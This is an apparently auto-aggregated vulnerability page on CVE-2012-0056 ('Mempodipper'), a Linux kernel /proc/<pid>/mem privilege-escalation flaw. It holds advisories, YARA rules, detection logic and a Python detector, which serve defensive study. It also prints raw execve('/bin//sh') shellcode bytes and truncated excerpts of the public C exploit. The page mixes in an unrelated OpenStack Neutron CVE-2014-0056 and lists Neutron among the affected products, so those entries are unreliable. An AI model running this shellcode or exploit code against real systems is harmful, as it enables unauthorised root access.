CVE-2012-0056
Published: 2012-01-27
Priority: P179 · medium · 6.9 (CVSS 2.0, AV:L/AC:M/Au:N/C:C/I:C/A:C)
Exploited in the wild (VulnCheck KEV)
EPSS: 10.90% (95.3th percentile)
The mem_write function in the Linux kernel before 3.2.2, when ASLR is disabled, does not properly check permissions when writing to /proc/<pid>/mem, which allows local users to gain privileges by modifying process memory, as demonstrated by Mempodipper.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | >= 0 < 3.11.0-12.19 | 3.11.0-12.19 |
| linux | linux_kernel | >= 0 < 4.2.0-16.19 | 4.2.0-16.19 |
| linux | linux_kernel | >= 2.6.39 < 3.0.18 | 3.0.18 |
| linux | linux_kernel | >= 3.1 < 3.2.2 | 3.2.2 |
| openstack | neutron | >= 2012.2 < 2013.2.3 | 2013.2.3 |
Detection & IOCs (extracted from sources)
bytes:
31 db b0 17 cd 80 31 db b0 2e cd 80 31 c9 b3 06 b1 02 b0 3f cd 80 31 c0 50 68 6e 2f 73 68 68 2f 2f 62 69 89 e3 31 d2 66 ba 2d 69 52 89 e0 31 d2 52 50 53 89 e1 31 d2 31 c0 b0 0b cd 80
bytes:
48 31 ff b0 69 0f 05 48 31 ff b0 6a 0f 05 40 b7 06 40 b6 02 b0 21 0f 05 48 bb 2f 2f 62 69 6e 2f 73 68 48 c1 eb 08 53 48 89 e7 48 31 db 66 bb 2d 69 53 48 89 e1 48 31 c0 50 51 57 48 89 e6 48 31 d2 b0 3b 0f 05
yara:
```yara
rule Linux_Exploit_CVE_2012_0056_b39839f4 {
    meta:
        author = "Elastic Security"
        id = "b39839f4-e6f4-44bd-a636-ce355f3c5c6a"
        fingerprint = "f269c4aecbb55e24d9081d7a1e4bd6cfa9799409b3a3d7a6f9bf127f7468dedc"
        creation_date = "2021-01-12"
        last_modified = "2021-09-16"
        threat_name = "Linux.Exploit.CVE-2012-0056"
        reference_sample = "cf569647759e011ff31d8626cea65ed506e8d0ef1d26f3bbb7c02a4060ce58dc"
        severity = 100
        arch_context = "x86"
        scan_context = "file, memory"
        license = "Elastic License v2"
        os = "linux"
    strings:
        $a = { 08 02 7E 3E 8B 45 0C 83 C0 04 8B 00 0F B6 00 3C 2D 75 2F 8B }
    condition:
        all of them
}
```
Detection points:
- Monitor for open() calls with O_RDWR on /proc/[pid]/mem by a process that is not the target process owner — this is the core exploitation primitive used by Mempodipper.
- Detect creation of a Unix domain socket at /tmp/.sockpuppet, used by the exploit for parent-child file descriptor passing.
- Alert on a process spawning /bin/su with a shellcode string as its first argument (argv[1] containing non-printable bytes), as the exploit passes shellcode directly to execl("/bin/su").
- Detect use of ptrace (PTRACE_SYSCALL / PTRACE_SINGLESTEP) against a child /bin/su process to locate the exit@plt address — an unusual ptrace pattern for privilege escalation.
- Scan process memory and files for the Elastic YARA byte signature { 08 02 7E 3E 8B 45 0C 83 C0 04 8B 00 0F B6 00 3C 2D 75 2F 8B } associated with the Mempodipper exploit binary.
- Detect lseek64 followed by write on /proc/[ppid]/mem from a child process — the exploit seeks to the target offset in parent memory before writing shellcode.
Notes:
- The vulnerability is only exploitable when ASLR is disabled; systems with ASLR enabled are not affected by this specific attack path.
- Red Hat Enterprise Linux 4 and 5 are not affected because they did not backport upstream commit 198214a7ee, which introduced the vulnerable code path.
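The detection points above, worked through as an added example that is not code from any of the sources aggregated on this page: a small Python detector that runs the /proc/[pid]/mem write check, the /bin/su non-printable argv[1] check and the /tmp/.sockpuppet socket check over a constructed event stream. The Event schema, the pid-to-(euid, ppid) snapshot and the sample events are assumptions standing in for what an auditd or EDR pipeline would actually supply.

```python
"""Host-side detection logic for the Mempodipper (CVE-2012-0056) exploitation
pattern.  Added example, not code from the page's sources: the Event record,
the process-table snapshot and the sample events are constructed here to stand
in for what an auditd/EDR pipeline would feed in."""
import re
from dataclasses import dataclass, field

PROC_MEM = re.compile(r"^/proc/(\d+|self)/mem$")
O_ACCMODE, O_WRONLY, O_RDWR = 0o3, 0o1, 0o2   # open(2) access-mode bits on Linux


@dataclass
class Event:
    kind: str                  # "open", "execve" or "bind" (constructed schema)
    pid: int                   # process issuing the syscall
    uid: int                   # its real uid
    path: str = ""             # file opened, binary executed or socket path bound
    flags: int = 0             # open(2) flags
    argv: list = field(default_factory=list)


def is_write_mode(flags: int) -> bool:
    """True when the open(2) flags request write access (O_WRONLY or O_RDWR)."""
    return (flags & O_ACCMODE) in (O_WRONLY, O_RDWR)


def has_nonprintable(arg: str) -> bool:
    """True when an argv element carries bytes outside printable ASCII,
    the tell-tale of shellcode handed to /bin/su as an argument."""
    return any(b < 0x20 or b > 0x7E for b in arg.encode("latin-1", "replace"))


def mempodipper_alerts(events, proc_table):
    """proc_table maps pid -> (euid, ppid) as recorded alongside the events.
    Returns one alert string per suspicious event, in input order."""
    alerts = []
    for ev in events:
        if ev.kind == "open":
            m = PROC_MEM.match(ev.path)
            if not m or not is_write_mode(ev.flags):
                continue                       # not a write-mode open of /proc/<pid>/mem
            target = ev.pid if m.group(1) == "self" else int(m.group(1))
            target_euid = proc_table.get(target, (None, None))[0]
            own_ppid = proc_table.get(ev.pid, (None, None))[1]
            if target_euid != ev.uid:          # opener is not the owner of the target process
                alerts.append(f"pid {ev.pid} (uid {ev.uid}) opened {ev.path} for writing; "
                              f"target runs as euid {target_euid}")
            elif target == own_ppid:           # child writing into its parent's memory
                alerts.append(f"pid {ev.pid} opened its parent's {ev.path} for writing")
        elif ev.kind == "execve" and ev.path == "/bin/su":
            if len(ev.argv) > 1 and has_nonprintable(ev.argv[1]):
                alerts.append(f"pid {ev.pid} executed /bin/su with non-printable argv[1] "
                              f"({len(ev.argv[1])} bytes)")
        elif ev.kind == "bind" and ev.path == "/tmp/.sockpuppet":
            alerts.append(f"pid {ev.pid} bound a Unix socket at {ev.path}")
    return alerts


# Constructed process-table snapshot: 4242 is an unprivileged process (uid 1000),
# 4243 is its child after exec'ing the setuid /bin/su (euid 0), 4260 is another
# child of 4242, 4250 is an unrelated user process.
PROC_TABLE = {4242: (1000, 1), 4243: (0, 4242), 4250: (1000, 1), 4260: (1000, 4242)}

# Constructed sample events: four match the pattern, three are benign.
EVENTS = [
    Event("bind", 4242, 1000, path="/tmp/.sockpuppet"),
    Event("execve", 4243, 1000, path="/bin/su", argv=["/bin/su", "\x31\xdb\xb0\x17\xcd\x80"]),
    Event("open", 4242, 1000, path="/proc/4243/mem", flags=O_RDWR),   # write into a euid-0 process
    Event("open", 4260, 1000, path="/proc/4242/mem", flags=O_RDWR),   # child writing its parent
    Event("open", 4242, 1000, path="/proc/4242/maps"),                # read of maps, benign
    Event("open", 4242, 1000, path="/proc/self/mem"),                 # read-only open, benign
    Event("execve", 4250, 1000, path="/bin/su", argv=["/bin/su", "-"]),  # ordinary su
]

if __name__ == "__main__":
    for line in mempodipper_alerts(EVENTS, PROC_TABLE):
        print("ALERT:", line)
```

The euid comparison is what makes the first open() check meaningful: a write-mode open of /proc/self/mem by an ordinary process is not flagged, while a write-mode open of a setuid process's memory by the unprivileged user who spawned it is. In a real pipeline the (euid, ppid) pair would come from the process-creation events that precede the open, not from a static dictionary.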
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 6.9 | MEDIUM | AV:L/AC:M/Au:N/C:C/I:C/A:C |
| osv | | 6.9 | MEDIUM | |
| vulncheck | | 6.9 | MEDIUM | |
| vendor_redhat | | 6.9 | MEDIUM | |
| vendor_ubuntu | | 5.5 | MEDIUM | |
Red Hat
openstack-neutron: insufficient authorization checks when creating ports
vendor_redhat·2014-03-28·CVSS 2.1
CVE-2014-0056 [LOW] CWE-285 openstack-neutron: insufficient authorization checks when creating ports
openstack-neutron: insufficient authorization checks when creating ports
The l3-agent in OpenStack Neutron 2012.2 before 2013.2.3 does not check the tenant id when creating ports, which allows remote authenticated users to plug ports into the routers of arbitrary tenants via the device id in a port-create command.
Package: openstack-neutron (Red Hat Enterprise Linux OpenStack Platform 5 (Icehouse)) - Not affected
Package: openstack-quantum (Red Hat OpenStack Platform 3) - Will not fix
Ubuntu
Linux kernel (OMAP4) vulnerabilities
vendor_ubuntu·2012-02-13·CVSS 5.5
CVE-2011-4097 [MEDIUM] Linux kernel (OMAP4) vulnerabilities
Title: Linux kernel (OMAP4) vulnerabilities
Summary: Several security issues were fixed in the kernel.
A bug was discovered in the Linux kernel's calculation of OOM (Out of
memory) scores, that would result in the wrong process being killed. A user
could use this to kill the process with the highest OOM score, even if that
process belongs to another user or the system. (CVE-2011-4097)
A flaw was discovered in the XFS filesystem. If a local user mounts a
specially crafted XFS image it could potentially execute arbitrary code on
the system. (CVE-2012-0038)
Andy Whitcroft discovered that the Overlayfs filesystem was not doing the
extended permission checks needed by cgroups and Linux Security Modules
(LSMs). A local user could exploit this to bypass security policy and
access files that
Ubuntu
Linux kernel (Oneiric backport) vulnerability
vendor_ubuntu·2012-01-26
CVE-2012-0056 Linux kernel (Oneiric backport) vulnerability
Title: Linux kernel (Oneiric backport) vulnerability
Summary: The system could be made to run programs as an administrator.
Jüri Aedla discovered that the kernel incorrectly handled /proc/<pid>/mem
permissions. A local attacker could exploit this and gain root privileges.
Instructions: After a standard system update you need to reboot your computer to make
all the necessary changes.
Ubuntu
Linux kernel vulnerability
vendor_ubuntu·2012-01-23·CVSS 2.1
CVE-2011-2203 [LOW] Linux kernel vulnerability
Title: Linux kernel vulnerability
Summary: The system could be made to run programs as an administrator.
Clement Lecigne discovered a bug in the HFS filesystem. A local attacker
could exploit this to cause a kernel oops. (CVE-2011-2203)
A bug was discovered in the XFS filesystem's handling of pathnames. A local
attacker could exploit this to crash the system, leading to a denial of
service, or gain root privileges. (CVE-2011-4077)
A flaw was found in how the Linux kernel handles user-defined key types. An
unprivileged local user could exploit this to crash the system.
(CVE-2011-4110)
A flaw was found in the Journaling Block Device (JBD). A local attacker
able to mount ext3 or ext4 file systems could exploit this to crash the
system, leading to a denial of service. (CVE-2011-4132)
Cle
Red Hat
kernel: proc: /proc/<pid>/mem mem_write insufficient permission checking
vendor_redhat·2012-01-18·CVSS 6.9
CVE-2012-0056 [MEDIUM] CWE-863 kernel: proc: /proc/<pid>/mem mem_write insufficient permission checking
kernel: proc: /proc/<pid>/mem mem_write insufficient permission checking
The mem_write function in the Linux kernel before 3.2.2, when ASLR is disabled, does not properly check permissions when writing to /proc/<pid>/mem, which allows local users to gain privileges by modifying process memory, as demonstrated by Mempodipper.
Statement: This issue did not affect the version of Linux kernel as shipped with Red Hat Enterprise Linux 4 and 5 as it did not backport the upstream commit 198214a7ee. This has been addressed in Red Hat Enterprise Linux 6 and Red Hat Enterprise MRG via https://rhn.redhat.com/errata/RHSA-2012-0052.html and https://rhn.redhat.com/errata/RHSA-2012-0061.html. For more information, please read https://access.redhat.com/kb/docs/DOC-69129.
Package: kernel (Red Hat Enterprise Linux
GHSA
OpenStack Neutron Improper Authentication vulnerability
ghsa·2022-05-17
CVE-2014-0056 [MEDIUM] CWE-287 OpenStack Neutron Improper Authentication vulnerability
OpenStack Neutron Improper Authentication vulnerability
The l3-agent in OpenStack Neutron 2012.2 before 2013.2.3 does not check the tenant id when creating ports, which allows remote authenticated users to plug ports into the routers of arbitrary tenants via the device id in a port-create command.
GHSA
GHSA-h6ww-x4xv-2vj2: The mem_write function in the Linux kernel before 3
ghsa_unreviewed·2022-05-04
CVE-2012-0056 [MEDIUM] GHSA-h6ww-x4xv-2vj2: The mem_write function in the Linux kernel before 3
The mem_write function in the Linux kernel before 3.2.2, when ASLR is disabled, does not properly check permissions when writing to /proc/<pid>/mem, which allows local users to gain privileges by modifying process memory, as demonstrated by Mempodipper.
OSV
CVE-2012-0056: The mem_write function in the Linux kernel before 3
osv·2012-01-19·CVSS 6.9
CVE-2012-0056 [MEDIUM] CVE-2012-0056: The mem_write function in the Linux kernel before 3
The mem_write function in the Linux kernel before 3.2.2, when ASLR is disabled, does not properly check permissions when writing to /proc/<pid>/mem, which allows local users to gain privileges by modifying process memory, as demonstrated by Mempodipper.
VulnCheck
Linux kernel before 3.2.2 Process Memory Modification Vulnerability
vulncheck·2012·CVSS 6.9
CVE-2012-0056 [MEDIUM] Linux kernel before 3.2.2 Process Memory Modification Vulnerability
Linux kernel before 3.2.2 Process Memory Modification Vulnerability
The mem_write function in the Linux kernel before 3.2.2, when ASLR is disabled, does not properly check permissions when writing to /proc/<pid>/mem, which allows local users to gain privileges by modifying process memory, as demonstrated by Mempodipper.
Affected: Linux Kernel
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.kb.cert.org/vuls/id/470151; https://dl.acm.org/doi/pdf/10.1145/3465481.3465758
Exploit PoC: https://vulncheck.com/xdb/2af87af690ba; https://vulncheck.com/xdb/9e3c0b9449c2; https://vulncheck.com/xdb/7789f7055022
YARA
Linux_Exploit_CVE_2012_0056_b39839f4
yara·CVSS 6.9
CVE-2012-0056 [MEDIUM] Linux_Exploit_CVE_2012_0056_b39839f4
```yara
rule Linux_Exploit_CVE_2012_0056_b39839f4 {
    meta:
        author = "Elastic Security"
        id = "b39839f4-e6f4-44bd-a636-ce355f3c5c6a"
        fingerprint = "f269c4aecbb55e24d9081d7a1e4bd6cfa9799409b3a3d7a6f9bf127f7468dedc"
        creation_date = "2021-01-12"
        last_modified = "2021-09-16"
        threat_name = "Linux.Exploit.CVE-2012-0056"
        reference_sample = "cf569647759e011ff31d8626cea65ed506e8d0ef1d26f3bbb7c02a4060ce58dc"
        severity = 100
        arch_context = "x86"
        scan_context = "file, memory"
        license = "Elastic License v2"
        os = "linux"
    strings:
        $a = { 08 02 7E 3E 8B 45 0C 83 C0 04 8B 00 0F B6 00 3C 2D 75 2F 8B }
    condition:
        all of them
}
```
YARA
Linux_DirtyCow_Exploit
yara·CVSS 6.9
CVE-2012-0056 [MEDIUM] Linux_DirtyCow_Exploit
```yara
rule Linux_DirtyCow_Exploit {
    meta:
        description = "Detects Linux Dirty Cow Exploit - CVE-2012-0056 and CVE-2016-5195"
        author = "Florian Roth"
        reference = "http://dirtycow.ninja/"
        date = "2016-10-21"
    strings:
        $a1 = { 48 89 D6 41 B9 00 00 00 00 41 89 C0 B9 02 00 00 00 BA 01 00 00 00 BF 00 00 00 00 }
        $b1 = { E8 ?? FC FF FF 48 8B 45 E8 BE 00 00 00 00 48 89 C7 E8 ?? FC FF FF 48 8B 45 F0 BE 00 00 00 00 48 89 }
        $b2 = { E8 ?? FC FF FF B8 00 00 00 00 }
        $source1 = "madvise(map,100,MADV_DONTNEED);"
        $source2 = "=open(\"/proc/self/mem\",O_RDWR);"
        $source3 = ",map,SEEK_SET);"
        $source_printf1 = "mmap %x"
        $source_printf2 = "procselfmem %d"
        $source_printf3 = "madvise %d"
        $source_printf4 = "[-] failed to patch payload"
        $source_printf5 = "[-] failed to win race condition..."
        $source_printf6 = "[*] waiting
```
YARA
Linux_Exploit_CVE_2012_0056_06b2dff5
yara·CVSS 6.9
CVE-2012-0056 [MEDIUM] Linux_Exploit_CVE_2012_0056_06b2dff5
```yara
rule Linux_Exploit_CVE_2012_0056_06b2dff5 {
    meta:
        author = "Elastic Security"
        id = "06b2dff5-250a-46e0-b763-8e6b04498fe2"
        fingerprint = "82b200deae93c8fa376d670f5091d9a63730a6f5b5e8a0567fe9c283075d57c0"
        creation_date = "2021-01-12"
        last_modified = "2021-09-16"
        threat_name = "Linux.Exploit.CVE-2012-0056"
        reference_sample = "168b3fb1c675ab76224c641e228434495160502a738b64172c679e8ce791ac17"
        severity = 100
        arch_context = "x86"
        scan_context = "file, memory"
        license = "Elastic License v2"
        os = "linux"
    strings:
        $a = { 20 66 64 20 69 6E 20 70 61 72 65 6E 74 2E 00 5B 2B 5D 20 52 65 63 }
    condition:
        all of them
}
```
YARA
Linux_Exploit_CVE_2012_0056_a1e53450
yara·CVSS 6.9
CVE-2012-0056 [MEDIUM] Linux_Exploit_CVE_2012_0056_a1e53450
```yara
rule Linux_Exploit_CVE_2012_0056_a1e53450 {
    meta:
        author = "Elastic Security"
        id = "a1e53450-036e-4ae3-bfe4-64a6c7239a04"
        fingerprint = "d0a0635fb356ccedb1448082cc63748d49d45f8a25e43eab7ac1d67e87062b8f"
        creation_date = "2021-04-06"
        last_modified = "2021-09-16"
        threat_name = "Linux.Exploit.CVE-2012-0056"
        reference_sample = "15a4d149e935758199f6df946ff889e12097f5fec4ef450e9cbd554d1efbd5e6"
        severity = 100
        arch_context = "x86"
        scan_context = "file, memory"
        license = "Elastic License v2"
        os = "linux"
    strings:
        $a = { 80 31 C9 B3 ?? B1 02 B0 3F CD 80 31 C0 50 68 6E }
    condition:
        all of them
}
```
Exploit-DB
Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege Escalation (1)
exploitdb·2012-01-23·CVSS 6.9
CVE-2012-0056 [MEDIUM] Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege Escalation (1)
Linux Kernel 2.6.39 =2.6.39, 32-bit and 64-bit
```c
# Date: Jan 21, 2012
# Author: zx2c4
# Tested on: Gentoo, Ubuntu
# Platform: Linux
# Category: Local
# CVE-2012-0056
 * Mempodipper
 * by zx2c4
 *
 * Linux Local Root Exploit
 *
 * Rather than put my write up here, per usual, this time I've put it
 * in a rather lengthy blog post: http://blog.zx2c4.com/749
 *
 * Enjoy.
 *
 * - zx2c4
 * Jan 21, 2012
 *
 * CVE-2012-0056
 */
#define _LARGEFILE64_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
char *socket_path = "/tmp/.sockpuppet";
int send_fd(int fd)
{
    char buf[1];
    struct iovec iov;
    struct msghdr msg;
    struct cmsghdr *cmsg;
    struct sockaddr_un addr;
    int n;
    int sock;
    char cms[CMSG_SPACE(sizeof(int))];
    if ((sock = socket(AF_UNIX, SOCK_STREAM, 0)) cmsg_len = CMS
```
Exploit-DB
Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2)
exploitdb·2012-01-12·CVSS 6.9
CVE-2012-0056 [MEDIUM] Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2)
Linux Kernel 2.6.39
```c
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
char *prog_name;
int send_fd(int sock, int fd)
{
    char buf[1];
    struct iovec iov;
    struct msghdr msg;
    struct cmsghdr *cmsg;
    int n;
    char cms[CMSG_SPACE(sizeof(int))];
    buf[0] = 0;
    iov.iov_base = buf;
    iov.iov_len = 1;
    memset(&msg, 0, sizeof msg);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = (caddr_t)cms;
    msg.msg_controllen = CMSG_LEN(sizeof(int));
    cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    memmove(CMSG_DATA(cmsg), &fd, sizeof(int));
    if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len)
        return -1;
    close(sock);
    return 0;
}
int recv_fd(int sock)
{
    int n;
    i
```
Bugzilla
CVE-2014-0056 openstack-neutron: insufficient authorization checks when creating ports
bugzilla·2014-02-10·CVSS 2.1
CVE-2014-0056 [LOW] CVE-2014-0056 openstack-neutron: insufficient authorization checks when creating ports
CVE-2014-0056 openstack-neutron: insufficient authorization checks when creating ports
The OpenStack project reports:
Title: Routers can be cross plugged by other tenants
Reporter: Aaron Rosen (VMWare)
Products: Neutron
Affects: 2012.2 versions up to 2013.2.2
Description:
Aaron Rosen from VMWare reported a vulnerability where Neutron fails to
perform proper authorization checks when creating ports. By choosing a
device id of a router from a different tenant when creating a port, an
authenticated user can access the network of other tenants. This affects
deployments of Neutron using plugins relying on the l3-agent.
Discussion:
Acknowledgements:
Red Hat would like to thank the OpenStack project for reporting this issue. Upstream acknowledges Aaron Rosen from VMware as the original repo
Bugzilla
CVE-2012-0056 kernel: proc: /proc/<pid>/mem mem_write insufficient permission checking [fedora-all]
bugzilla·2012-01-18·CVSS 6.9
CVE-2012-0056 [MEDIUM] CVE-2012-0056 kernel: proc: /proc/<pid>/mem mem_write insufficient permission checking [fedora-all]
CVE-2012-0056 kernel: proc: /proc/<pid>/mem mem_write insufficient permission checking [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include this bug ID and the
bug IDs of this bug's parent bugs filed against the "Security Response"
product (the top-level CVE bugs). Please mention the CVE IDs being fixed
in the RPM changelog when available.
Bodhi update submission link:
https://admin.fedoraproject.org/updates/
Bugzilla
CVE-2012-0056 kernel: proc: /proc/<pid>/mem mem_write insufficient permission checking
bugzilla·2012-01-18·CVSS 6.9
CVE-2012-0056 [MEDIUM] CVE-2012-0056 kernel: proc: /proc/<pid>/mem mem_write insufficient permission checking
CVE-2012-0056 kernel: proc: /proc/<pid>/mem mem_write insufficient permission checking
From Linus' patch:
"Jüri Aedla reported that the /proc/<pid>/mem handling really isn't very robust, and it also doesn't match the permission checking of any of the other related files.
This changes it to do the permission checks at open time, and instead of tracking the process, it tracks the VM at the time of the open. That simplifies the code a lot, but does mean that if you hold the file descriptor open over an execve(), you'll continue to read from the _old_ VM."
A local, unprivileged user could use this flaw to escalate their privileges.
Upstream commit:
http://git.kernel.org/linus/e268337dfe26dfc7efd422a804dbb27977a3cccc
Acknowledgements:
Red Hat would like to thank Jüri Aedla for reporting this issue.
References:
- http://blog.zx2c4.com/749
- http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commitdiff%3Bh=e268337dfe26dfc7efd422a804dbb27977a3cccc
- http://secunia.com/advisories/47708
- http://ubuntu.com/usn/usn-1336-1
- http://www.kb.cert.org/vuls/id/470151
- http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.2.2
- http://www.openwall.com/lists/oss-security/2012/01/18/1
- http://www.openwall.com/lists/oss-security/2012/01/18/2
- http://www.openwall.com/lists/oss-security/2012/01/19/4
- http://www.openwall.com/lists/oss-security/2012/01/22/4
- http://www.redhat.com/support/errata/RHSA-2012-0052.html
- http://www.redhat.com/support/errata/RHSA-2012-0061.html
- http://www.securityfocus.com/bid/51625
- https://bugzilla.redhat.com/show_bug.cgi?id=782642